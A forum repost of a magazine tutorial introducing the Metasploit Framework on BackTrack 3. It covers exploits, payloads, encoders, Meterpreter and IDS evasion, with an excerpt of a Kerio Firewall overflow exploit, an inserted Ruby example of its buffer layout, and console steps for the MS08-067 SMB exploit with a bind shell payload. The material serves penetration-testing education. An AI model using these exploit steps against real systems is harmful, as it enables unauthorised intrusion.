Yeah, I kinda wrote this as a tutorial for a magazine, but I thought I would release it to you guys as well because it uses BackTrack 3. Most of you probably already know how to do this, so it's kinda written for the newbies, but it's here nonetheless. Opinions please. For the original PDF version (which has pictures), go to http://greyhat-security.com/msf.pdf

(Apologies for the multiple replies - but there's a 10,000 character limit per post; it didn't all fit.)

About the Article

You've probably heard a lot of talk about Metasploit over the years; about how it can speed up the results of exploitation. It is a great tool for Penetration testers. It makes their job of exploitation and post-exploitation a lot easier, and a lot faster. However, coverage on how to use Metasploit is not always readily available. There are a few lesser known features of Metasploit which I would like to show you. The aim of this article is to teach you what the Metasploit project is, the basics of how to use it, and an example of a lesser known feature: how to use Metasploit to tunnel from inside a corporate network when an external firewall is impenetrable, and then how to exploit the internal network from there. Curious? Read on.

So – Metasploit?
The Metasploit Framework is a program and subproject developed by Metasploit LLC. It was initially created in 2003 in the Perl programming language, but was later completely re-written in the Ruby programming language. As of the most recent release (3.2), it is released under the BSD licensing scheme (which makes it truly Open Source, as opposed to its previous Metasploit License, which made it only partially Open Source).

Metasploit aims to provide an exploit development framework for Penetration Testers, as well as to simplify the process of exploit development. Exploits are bits of code or scripts that take advantage of a vulnerability in a program and perform unauthorized actions. Examples of such actions include the execution of arbitrary code, the crashing of a particular program, or DoS of a particular system or service. Exploits are used by Penetration Testers to test various programs on a network for vulnerabilities (before hackers/crackers are able to), so that they can be fixed. They are also used and abused by “script kiddies” or “Black Hats” to break into systems. Typically, a vulnerability researcher would have to go through the cycle of Discovery > Disclosure > Analysis > Exploit Development > Testing > Release. However, since the release of Metasploit, exploit development is now quite a simple process that even an amateur coder can accomplish. It also serves as a development platform for payloads (the code executed after an exploit has successfully run), payload encoders (to obscure data so that Intrusion Detection Systems [IDS] and Intrusion Protection Systems [IPS] don't pick up and block the exploit), and various other tools. The Metasploit Project also contains a NOP Code Database (sets of Assembly language instructions for the processor that do nothing, used to pad exploit buffers).

Metasploit has a few distinct advantages for penetration testers. One of them is that you can use Metasploit to test an exploit (whether it's your own or someone else's) on all the machines on a network simultaneously, and have it automatically exploit and gain you an Administrative shell on each system. You can also feed it results from other programs (such as Nmap or Nessus – usage instructions for these can be found on the vendor website, or at http://greyhat-security.com/) and use that to target only specific services in a network wide exploit session. It also simplifies the job of a penetration tester in the sense that they are able to start up Metasploit, leave it running by itself in the background, and proceed to attempt other Network Penetration Tests. A distinct advantage that is good for a quick preliminary vulnerability assessment is Metasploit's ability to integrate with Nmap to perform an action known as “Autopwning” (read more about it below).
Additionally, if a compromised box has two or more separate subnets or NICs (Network Interface Cards), then the Penetration Tester can add a tunnel through this box via Metasploit, and is therefore able to interact with or exploit the machines on the separate subnet which the Penetration Tester could not initially access. Aside from Metasploit's sheer power and ease of use, it also allows Forensic Avoidance tools and a number of other IDS evasion techniques to be executed. The 3.0 branch of the development also allows developers to code their own plug-ins, allowing for an unlimited number of options (limited only by creativity and personal ability).

The Metasploit Framework has a number of different interfaces which a user can choose to interact with. The command line interface is the interface of choice for most Linux users, due to its simplicity and light-weight nature. It is operated through a series of commands. It allows the user to: choose an exploit and a payload, show options for both of these, configure options for both of these, choose a platform, and launch the exploit. The Web interface is the UI of choice for most Windows users, as the separate command line isn't always guaranteed to be stable – the web interface contains a built-in command line, as well as a graphical exploitation option. This can be started by going to Start Menu > Programs > Metasploit Framework > MSFWeb, and then firing up your web browser and going to http://127.0.0.1:55555. The MSF (Metasploit Framework) GUI is also a popular option for Windows users, as it feels more like a conventional “program” than a command line, and is what most Windows users are comfortable with. There is also a Metasploit daemon, which is a Metasploit command line tool that listens for, and interacts with, remote connections.

The MSF focuses on simplicity for the Penetration Tester. For example, the following code is from the body of the Kerio Firewall 2.1.4 Authentication Packet Overflow exploit:
Code Listing 1:
Code:
connect                                                  # open the TCP socket to the target
print_status("Trying target #{target.name}...")
sploit = make_nops(4468) + payload.encoded               # NOP sled followed by the encoded payload
sploit << [target.ret].pack('V') + [0xe8, -850].pack('CV') # return address, then a 5-byte trailer, all little-endian
sock.put(sploit)                                         # send the buffer
sock.get_once(-1, 3)                                     # read any response, 3 second timeout
handler                                                  # hand off to the payload handler
disconnect
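The two Array#pack calls in Listing 1 decide the exact byte layout that goes onto the wire, and it is not obvious from the listing why a negative number can be packed with 'V'. The following is an added example, not code from the article or from the Metasploit project; the payload bytes and return address are constructed placeholders, and a plain 0x90 sled stands in for the make_nops mixin.

```ruby
# 'V' packs a 32-bit unsigned little-endian value; 'C' packs one unsigned byte.
# Ruby reduces the argument modulo 2**32, so -850 becomes its two's-complement
# form 0xFFFFFCAE, emitted as the bytes ae fc ff ff.
def pack_v(value)
  [value].pack('V')
end

def pack_cv(byte, dword)
  [byte, dword].pack('CV')
end

# Reads the 5-byte trailer back as an opcode byte plus a SIGNED 32-bit
# little-endian displacement ('l<'), which recovers the original -850.
def unpack_trailer(bytes)
  bytes.unpack('Cl<')
end

# Mirrors the buffer layout of Listing 1: sled + payload + ret + trailer.
# .b forces binary encoding so high bytes from pack concatenate cleanly.
def build_layout(nop_count, payload, ret)
  sled = [0x90].pack('C') * nop_count
  sled + payload.b + pack_v(ret) + pack_cv(0xe8, -850)
end

# Offsets of each field, so a reader can see where ret lands in the buffer.
def layout_offsets(nop_count, payload)
  ret_at = nop_count + payload.bytesize
  { ret: ret_at, trailer: ret_at + 4, total: ret_at + 4 + 5 }
end

if __FILE__ == $PROGRAM_NAME
  buf = build_layout(4, 'ABCD', 0x41424344)   # constructed placeholders
  puts buf.unpack1('H*')                     # hex dump of the 17-byte buffer
  p unpack_trailer(pack_cv(0xe8, -850))      # [232, -850]
end
```
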
A powerful feature of the MSF that simplifies the post-exploitation process is the Meterpreter module, which is injected directly into a running process on the exploited system, aiding in IDS evasion and helping to avoid detection by the user. In a penetration test, a lot of focus is placed on information gathering and exploitation, but not a lot of importance is given to the power of the post-exploitation phase. It is during this period that the most damage is done, and this is where Meterpreter becomes quite handy. Meterpreter aims to avoid HIDS (Host Intrusion Detection Systems) by injecting itself into the running process, as well as providing the attacker with a platform on which further scripts can be coded and launched. It is an injected attack platform. It also supports port forwarding in a manner similar to SSH. The MSF Project also has support for database integration, so it can output to and interact with various databases, such as Postgres or SQLite.

How do you work Metasploit?

Metasploit is simple to use – as was mentioned before, it is designed with ease-of-use in mind to aid Penetration Testers. It functions in the following way: you gather info about the target (ports, services, etc.), decide on a vulnerable service, select the exploit, fill in a few options, select a payload, fill in options there as well, and then launch the exploit. I will walk you through a brief demo, just so you can get familiar with the basics of the MSF, then you can work at your own pace. I will be taking you through this demo in BackTrack 3 (which is what Hakin9 Live is based on), so go ahead and download that if you don't already have it - http://www.remote-exploit.org/backtrack_download.html. The reason for using BackTrack 3 is that it has the correct Ruby libraries. The most up-to-date Ruby library (except for the CVS snapshot) isn't completely compatible with Metasploit. First, take your copy of BackTrack, and go to:
K menu > Backtrack > Penetration > Framework Version 3 > Framework3-MsfC
This will bring up the main Metasploit console prompt. Once this is done, you have many options. The first step (after scanning your target system for open ports/services) is to show the available exploits:
show exploits
This will bring up a list of all of them (the list is shown as a screenshot in the PDF version).
For this example, we will choose the recent Microsoft MS08_067 exploit. To select it, you type “use”, and the name of the exploit as displayed on the left:
use windows/smb/ms08_067_netapi
This will select that desired exploit. Now, we need to take a look at the options (you can also see the vulnerable systems available with the “show targets” command – this is not required for this exploit however):
show options
Just before we go setting options, we also need to choose a payload:
show payloads
set payload windows/shell/bind_tcp
show options


And finally, we are required to set the options. In this case, only the RHOST value is needed (the target/remote host). Then type “exploit”:
set RHOST 192.168.1.3
exploit


Those are the basic usage steps behind a simple Metasploit exploitation. There are also a number of options for you to explore on your own; things such as encoding payloads to avoid Anti-Virus and IDS, constructing your own exploits, payload-generated executables, automated post-exploitation scripts, and numerous other tricks of the trade. Let's take a look at some of them.